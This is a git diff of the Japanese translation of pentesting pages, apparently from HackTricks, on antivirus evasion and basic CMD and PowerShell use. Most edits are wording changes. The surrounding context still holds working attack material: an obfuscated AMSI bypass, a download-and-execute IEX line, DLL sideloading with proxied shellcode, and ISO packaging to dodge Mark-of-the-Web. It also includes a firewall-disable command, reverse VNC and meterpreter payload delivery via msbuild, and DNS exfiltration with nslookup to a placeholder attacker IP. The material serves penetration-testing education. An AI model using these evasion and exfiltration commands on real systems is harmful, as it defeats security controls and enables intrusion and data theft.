@@ -81,7 +81,7 @@ C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hija
 
 悪意のあるDLLをプログラムが読み込むことを期待する名前で配置するだけでは、ペイロードは読み込まれません。プログラムはそのDLL内に特定の関数を期待しているため、この問題を解決するために、**DLLプロキシング/フォワーディング**という別の技術を使用します。
 
-**DLLプロキシング**は、プログラムがプロキシ（および悪意のある）DLLから元のDLLに対して行う呼び出しを転送し、プログラムの機能を保持しつつ、ペイロードの実行を処理できるようにします。
+**DLLプロキシング**は、プログラムがプロキシ（および悪意のある）DLLから元のDLLに行う呼び出しを転送し、プログラムの機能を保持しつつ、ペイロードの実行を処理できるようにします。
 
 私は[@flangvik](https://twitter.com/Flangvik/)の[SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy)プロジェクトを使用します。
 
@@ -98,6 +98,8 @@ C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hija
 ```
 5. Create a new visual studio project (C++ DLL), paste the code generated by SharpDLLProxy (Under output_dllname/dllname_pragma.c) and compile. Now you should have a proxy dll which will load the shellcode you've specified and also forward any calls to the original DLL.
 ```
+これが結果です：
+
 <figure><img src="../images/dll_sideloading_demo.gif" alt=""><figcaption></figcaption></figure>
 
 私たちのシェルコード（[SGN](https://github.com/EgeBalci/sgn)でエンコードされた）とプロキシDLLは、[antiscan.me](https://antiscan.me)で0/26の検出率を持っています！これは成功だと言えるでしょう。
@@ -125,9 +127,9 @@ Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freez
 
 ## AMSI (アンチマルウェアスキャンインターフェース)
 
-AMSIは「[ファイルレスマルウェア](https://en.wikipedia.org/wiki/Fileless_malware)」を防ぐために作成されました。最初は、AVは**ディスク上のファイル**のみをスキャンすることができたため、ペイロードを**直接メモリ内で実行**できれば、AVはそれを防ぐための十分な可視性を持っていませんでした。
+AMSIは「[ファイルレスマルウェア](https://en.wikipedia.org/wiki/Fileless_malware)」を防ぐために作成されました。最初は、AVは**ディスク上のファイル**のみをスキャンすることができたため、ペイロードを**直接メモリ内で**実行できれば、AVはそれを防ぐための十分な可視性を持っていませんでした。
 
-AMSI機能は、Windowsのこれらのコンポーネントに統合されています。
+AMSI機能はWindowsのこれらのコンポーネントに統合されています。
 
 - ユーザーアカウント制御、またはUAC（EXE、COM、MSI、またはActiveXインストールの昇格）
 - PowerShell（スクリプト、対話型使用、および動的コード評価）
@@ -135,7 +137,7 @@ AMSI機能は、Windowsのこれらのコンポーネントに統合されてい
 - JavaScriptおよびVBScript
 - Office VBAマクロ
 
-これにより、アンチウイルスソリューションは、スクリプトの内容を暗号化されておらず難読化されていない形式で公開することによって、スクリプトの動作を検査できます。
+これは、スクリプトの内容を暗号化されておらず難読化されていない形式で公開することにより、アンチウイルスソリューションがスクリプトの動作を検査できるようにします。
 
 `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')`を実行すると、Windows Defenderで次のアラートが表示されます。
 
@@ -151,11 +153,11 @@ AMSIを回避する方法はいくつかあります：
 
 AMSIは主に静的検出で機能するため、読み込もうとするスクリプトを変更することは、検出を回避する良い方法となる可能性があります。
 
-ただし、AMSIは複数のレイヤーがあってもスクリプトを難読化解除する能力を持っているため、難読化は実施方法によっては悪い選択肢となる可能性があります。これにより、回避が簡単ではなくなります。ただし、時には変数名をいくつか変更するだけで済むこともあるため、どれだけフラグが立てられているかによります。
+ただし、AMSIは複数の層があってもスクリプトを難読化解除する能力を持っているため、難読化の方法によっては悪い選択肢となる可能性があります。これにより、回避が簡単ではなくなります。ただし、時には変数名をいくつか変更するだけで済むこともあるため、どれだけフラグが立てられているかによります。
 
 - **AMSIバイパス**
 
-AMSIはpowershell（またはcscript.exe、wscript.exeなど）プロセスにDLLをロードすることによって実装されているため、特権のないユーザーとして実行していても簡単に改ざんすることが可能です。このAMSIの実装における欠陥により、研究者たちはAMSIスキャンを回避するための複数の方法を見つけました。
+AMSIはpowershell（またはcscript.exe、wscript.exeなど）プロセスにDLLを読み込むことによって実装されているため、特権のないユーザーとして実行していても簡単に改ざんすることが可能です。このAMSIの実装の欠陥により、研究者たちはAMSIスキャンを回避するための複数の方法を見つけました。
 
 **エラーを強制する**
 
@@ -165,7 +167,7 @@ AMSIの初期化を失敗させる（amsiInitFailed）ことで、現在のプ
 ```
 たった1行のPowerShellコードで、現在のPowerShellプロセスに対してAMSIを無効にすることができました。この行はもちろんAMSI自体によってフラグが立てられているため、この技術を使用するにはいくつかの修正が必要です。
 
-こちらは、私がこの [Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db) から取った修正されたAMSIバイパスです。
+こちらは、私がこの[Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db)から取った修正されたAMSIバイパスです。
 ```powershell
 Try{#Ams1 bypass technic nº 2
 $Xdatabase = 'Utils';$Homedrive = 'si'
@@ -179,25 +181,25 @@ $Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
 $Spotfix.SetValue($null,$true)
 }Catch{Throw $_}
 ```
-念のため、この投稿が公開されるとおそらくフラグが立つので、検出されないことを計画している場合は、コードを公開しないでください。
+念のため、この投稿が公開されるとおそらくフラグが立つので、検出されないことを計画している場合は、コードを公開しない方が良いでしょう。
 
 **メモリパッチ**
 
 この技術は最初に [@RastaMouse](https://twitter.com/_RastaMouse/) によって発見され、amsi.dll内の「AmsiScanBuffer」関数のアドレスを見つけ、それをE_INVALIDARGのコードを返す命令で上書きすることを含みます。これにより、実際のスキャンの結果は0を返し、これはクリーンな結果として解釈されます。
 
 > [!NOTE]
-> より詳細な説明については、[https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/)をお読みください。
+> より詳細な説明については [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) をお読みください。
 
-また、PowerShellを使用してAMSIをバイパスするための他の多くの技術もあります。詳細については、[**このページ**](basic-powershell-for-pentesters/#amsi-bypass)や[this repo](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)をチェックしてください。
+また、PowerShellを使用してAMSIをバイパスするための他の多くの技術もあります。詳細については [**このページ**](basic-powershell-for-pentesters/#amsi-bypass) と [このリポジトリ](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) をチェックしてください。
 
 また、このスクリプトはメモリパッチを介して各新しいPowerShellをパッチします。
 
 ## 難読化
 
-C#のクリアテキストコードを**難読化**したり、バイナリをコンパイルするための**メタプログラミングテンプレート**を生成したり、**コンパイルされたバイナリを難読化**するために使用できるツールはいくつかあります。
+C#のクリアテキストコードを**難読化**したり、バイナリをコンパイルするための**メタプログラミングテンプレート**を生成したり、**コンパイルされたバイナリを難読化**するために使用できるツールがいくつかあります。
 
-- [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: C#難読化ツール**
-- [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): このプロジェクトの目的は、[LLVM](http://www.llvm.org/)コンパイルスイートのオープンソースフォークを提供し、[コードの難読化](<http://en.wikipedia.org/wiki/Obfuscation_(software)>)と改ざん防止を通じてソフトウェアのセキュリティを向上させることです。
+- [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: C# 難読化ツール**
+- [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): このプロジェクトの目的は、[LLVM](http://www.llvm.org/) コンパイルスイートのオープンソースフォークを提供し、[コードの難読化](<http://en.wikipedia.org/wiki/Obfuscation_(software)>)と改ざん防止を通じてソフトウェアのセキュリティを向上させることです。
 - [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscatorは、`C++11/14`言語を使用して、外部ツールを使用せず、コンパイラを変更することなく、コンパイル時に難読化されたコードを生成する方法を示しています。
 - [**obfy**](https://github.com/fritzone/obfy): C++テンプレートメタプログラミングフレームワークによって生成された難読化された操作のレイヤーを追加し、アプリケーションをクラッキングしようとする人の生活を少し難しくします。
 - [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatrazは、.exe、.dll、.sysなどのさまざまなpeファイルを難読化できるx64バイナリ難読化ツールです。
@@ -223,7 +225,7 @@ SmartScreenは主に評判ベースのアプローチで機能し、一般的で
 > [!NOTE]
 > **信頼された**署名証明書で署名された実行可能ファイルは**SmartScreenをトリガーしない**ことに注意することが重要です。
 
-ペイロードがMark of The Webを受け取らないようにする非常に効果的な方法は、それらをISOのようなコンテナにパッケージ化することです。これは、Mark-of-the-Web（MOTW）が**非NTFS**ボリュームには**適用できない**ためです。
+ペイロードがMark of The Webを受け取らないようにする非常に効果的な方法は、それらをISOのようなコンテナにパッケージ化することです。これは、Mark-of-the-Web (MOTW) **が** **非NTFS**ボリュームに適用できないためです。
 
 <figure><img src="../images/image (640).png" alt=""><figcaption></figcaption></figure>
 
@@ -251,7 +253,7 @@ Adding file: /TotallyLegitApp.exe
 
 [+] Generated file written to (size: 3420160): container.iso
 ```
-スマートスクリーンをバイパスするデモで、[PackMyPayload](https://github.com/mgeeky/PackMyPayload/)を使用してペイロードをISOファイル内にパッケージ化します。
+スマートスクリーンをバイパスするためのデモで、ペイロードをISOファイル内にパッケージ化する方法を示しています。[PackMyPayload](https://github.com/mgeeky/PackMyPayload/)を使用しています。
 
 <figure><img src="../images/packmypayload_demo.gif" alt=""><figcaption></figcaption></figure>
 
@@ -259,13 +261,13 @@ Adding file: /TotallyLegitApp.exe
 
 C# バイナリをメモリにロードすることはかなり前から知られており、AVに捕まることなくポストエクスプロイトツールを実行するための非常に優れた方法です。
 
-ペイロードはディスクに触れずに直接メモリにロードされるため、プロセス全体のためにAMSIをパッチすることだけを心配すればよいです。
+ペイロードはディスクに触れずに直接メモリにロードされるため、プロセス全体でAMSIをパッチすることだけを心配すればよいです。
 
 ほとんどのC2フレームワーク（sliver、Covenant、metasploit、CobaltStrike、Havocなど）は、すでにC#アセンブリをメモリ内で直接実行する機能を提供していますが、異なる方法があります：
 
 - **Fork\&Run**
 
-これは、**新しい犠牲プロセスを生成し**、その新しいプロセスにポストエクスプロイトの悪意のあるコードを注入し、悪意のあるコードを実行し、終了したら新しいプロセスを終了させることを含みます。これには利点と欠点があります。フォークと実行の方法の利点は、実行が**私たちのビーコンインプラントプロセスの外で行われる**ことです。これは、ポストエクスプロイトアクションの何かがうまくいかない場合や捕まった場合、**私たちのインプラントが生き残る可能性がはるかに高くなる**ことを意味します。欠点は、**行動検出**によって捕まる可能性が**高くなる**ことです。
+これは、**新しい犠牲プロセスを生成し**、その新しいプロセスにポストエクスプロイトの悪意のあるコードを注入し、悪意のあるコードを実行し、終了したら新しいプロセスを終了させることを含みます。これには利点と欠点があります。フォークと実行の方法の利点は、実行が**私たちのビーコンインプラントプロセスの外部**で行われることです。これは、ポストエクスプロイトアクションで何かがうまくいかない場合や捕まった場合、**私たちのインプラントが生き残る可能性がはるかに高い**ことを意味します。欠点は、**行動検出**によって捕まる可能性が**高くなる**ことです。
 
 <figure><img src="../images/image (215).png" alt=""><figcaption></figcaption></figure>
 
@@ -276,15 +278,15 @@ C# バイナリをメモリにロードすることはかなり前から知ら
 <figure><img src="../images/image (1136).png" alt=""><figcaption></figcaption></figure>
 
 > [!NOTE]
-> C# アセンブリのロードについてもっと知りたい場合は、この記事をチェックしてください [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) と彼らのInlineExecute-Assembly BOF ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
+> C# アセンブリのロードについてもっと知りたい場合は、この記事をチェックしてください [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) と彼らのInlineExecute-Assembly BOF ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))。
 
 C# アセンブリを**PowerShellから**ロードすることもできます。 [Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader) と [S3cur3th1sSh1tのビデオ](https://www.youtube.com/watch?v=oe11Q-3Akuk)をチェックしてください。
 
 ## 他のプログラミング言語の使用
 
-[**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins)で提案されているように、攻撃者が制御するSMB共有にインストールされたインタープリタ環境へのアクセスを提供することで、他の言語を使用して悪意のあるコードを実行することが可能です。
+[**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins)で提案されているように、妥協されたマシンに**攻撃者が制御するSMB共有にインストールされたインタプリタ環境へのアクセスを与えることによって、他の言語を使用して悪意のあるコードを実行することが可能です**。
 
-インタープリタバイナリとSMB共有上の環境へのアクセスを許可することで、**妥協されたマシンのメモリ内でこれらの言語の任意のコードを実行することができます**。
+インタプリタバイナリとSMB共有上の環境へのアクセスを許可することで、妥協されたマシンの**メモリ内でこれらの言語の任意のコードを実行することができます**。
 
 リポジトリは次のように示しています：Defenderはスクリプトをスキャンし続けますが、Go、Java、PHPなどを利用することで、**静的シグネチャをバイパスする柔軟性が高まります**。これらの言語でランダムな非難読化リバースシェルスクリプトをテストした結果、成功が確認されています。
 
@@ -307,7 +309,7 @@ C# アセンブリを**PowerShellから**ロードすることもできます。
 ### **Defenderが悪意のあるものとして見つける部分を確認する**
 
 [**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck)を使用すると、**バイナリの一部を削除**して、**Defenderが悪意のあるものとして見つけている部分を特定し**、それを分割してくれます。\
-同じことを行う別のツールは、[**avred**](https://github.com/dobin/avred)で、オープンウェブでサービスを提供しています [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)
+同じことを行う別のツールは、[**avred**](https://github.com/dobin/avred)で、オープンウェブでサービスを提供しています [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)。
 
 ### **Telnetサーバー**
 
@@ -338,7 +340,7 @@ netsh advfirewall set allprofiles state off
 
 #### **リバース接続**
 
-**攻撃者**は **ホスト内で** バイナリ `vncviewer.exe -listen 5900` を実行し、リバース **VNC接続**をキャッチする準備をします。その後、**被害者**内で: winvncデーモン `winvnc.exe -run` を開始し、`winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900` を実行します。
+**攻撃者**は **ホスト内で** バイナリ `vncviewer.exe -listen 5900` を実行し、リバース **VNC接続**を受け取る準備をします。その後、**被害者**内で: winvncデーモン `winvnc.exe -run` を開始し、`winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900` を実行します。
 
 **警告:** ステルスを維持するために、いくつかのことを行ってはいけません
 
@@ -356,7 +358,7 @@ cd GreatSCT/setup/
 cd ..
 ./GreatSCT.py
 ```
-GreatSCTの内部：
+GreatSCTの内部:
 ```
 use 1
 list #Listing available payloads
@@ -366,7 +368,7 @@ sel lport 4444
 generate #payload is the default name
 #This will generate a meterpreter xml and a rcc file for msfconsole
 ```
-今、**lister**を`msfconsole -r file.rc`で**開始**し、**xmlペイロード**を次のように**実行**します:
+今すぐ **lister** を `msfconsole -r file.rc` で **開始** し、**xml ペイロード** を次のように **実行** します:
 ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
 ```
@@ -473,7 +475,7 @@ powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.g
 ```
 {% embed url="https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f" %}
 
-C# オブファスケーターのリスト: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
+C# オブfuscators リスト: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
 
 ### C++
 ```
diff --git a/src/windows-hardening/basic-cmd-for-pentesters.md b/src/windows-hardening/basic-cmd-for-pentesters.md
index 186b73bad..28f7cb87e 100644
--- a/src/windows-hardening/basic-cmd-for-pentesters.md
+++ b/src/windows-hardening/basic-cmd-for-pentesters.md
@@ -158,7 +158,7 @@ klist sessions
 ```
 net accounts
 ```
-### 資格情報
+### 認証情報
 ```bash
 cmdkey /list #List credential
 vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
@@ -314,7 +314,7 @@ who^ami   #whoami
 ```
 ### DOSfuscation
 
-オブフスケートされたCMDラインを生成します
+CMDラインを難読化します
 ```powershell
 git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
 cd Invoke-DOSfuscation
@@ -339,7 +339,7 @@ sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passi
 ```
 #### Victim
 
-**`for /f tokens`** テクニック: これにより、コマンドを実行し、各行の最初のX単語を取得して、DNSを介してサーバーに送信することができます。
+**`for /f tokens`** テクニック: これにより、コマンドを実行し、各行の最初のX単語を取得して、それをDNS経由で私たちのサーバーに送信することができます。
 ```bash
 for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
 for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
@@ -349,7 +349,7 @@ for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_ka
 #More complex commands
 for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
 ```
-出力を**リダイレクト**し、その後**読む**こともできます。
+出力を**リダイレクト**し、その後**読み取る**こともできます。
 ```
 whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
 for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
diff --git a/src/windows-hardening/basic-powershell-for-pentesters/README.md b/src/windows-hardening/basic-powershell-for-pentesters/README.md
index ba7724e03..b2946e622 100644
--- a/src/windows-hardening/basic-powershell-for-pentesters/README.md
+++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md
@@ -1,4 +1,4 @@
-# 基本的なPowerShellの使い方
+# 基本的なPowerShellの使い方 for Pentesters
 
 {{#include ../../banners/hacktricks-training.md}}
 
@@ -217,7 +217,7 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches
 Get-ChildItem Env: | ft Key,Value -AutoSize #get all values
 $env:UserName @Get UserName value
 ```
-## その他の接続されたドライブ
+## 他の接続されたドライブ
 ```powershell
 Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
 ```
@@ -227,6 +227,8 @@ $shell = New-Object -com shell.application
 $rb = $shell.Namespace(10)
 $rb.Items()
 ```
+[https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/)
+
 ## ドメインリコン
 
 {{#ref}}
@@ -250,7 +252,7 @@ Password       : 1ts-mag1c!!!
 SecurePassword : System.Security.SecureString
 Domain         : HTB
 ```
-XMLを直接解析すること：
+XMLを直接解析するか:
 ```powershell
 $cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
 
@@ -367,7 +369,7 @@ $ping = New-Object System.Net.Networkinformation.Ping
 ```powershell
 Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
 ```
-## **SDDL文字列を可読形式に変換する**
+## **SDDL文字列を読みやすい形式に変換する**
 ```powershell
 PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e53501445efb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5fd42471-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5430e777-c3ea-4024-902e-dde192204669;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;6f606079-3a82-4c1b-8efb-dcc8c91d26fe;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a7a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;614aea82-abc6-4dd0-a148-d67a59c72816;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;66437984-c3c5-498f-b269-987819ef484b;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;2cc06e9d-6f7e-426a-8825-0215de176e11;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;3263e3b8-fd6b-4c60-87f2-34bdaa9d69eb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e0abfd0-126a-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;7cb4c7d3-8787-42b0-b438-3c5d479ad31e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-526)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-527)(OA;CI;DTWD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CCDCLCRPWPLO;f0f8ffac-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;CCDCLCRPWPLO;e8b2aff2-59a7-4eac-9a70-819adef701dd;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;C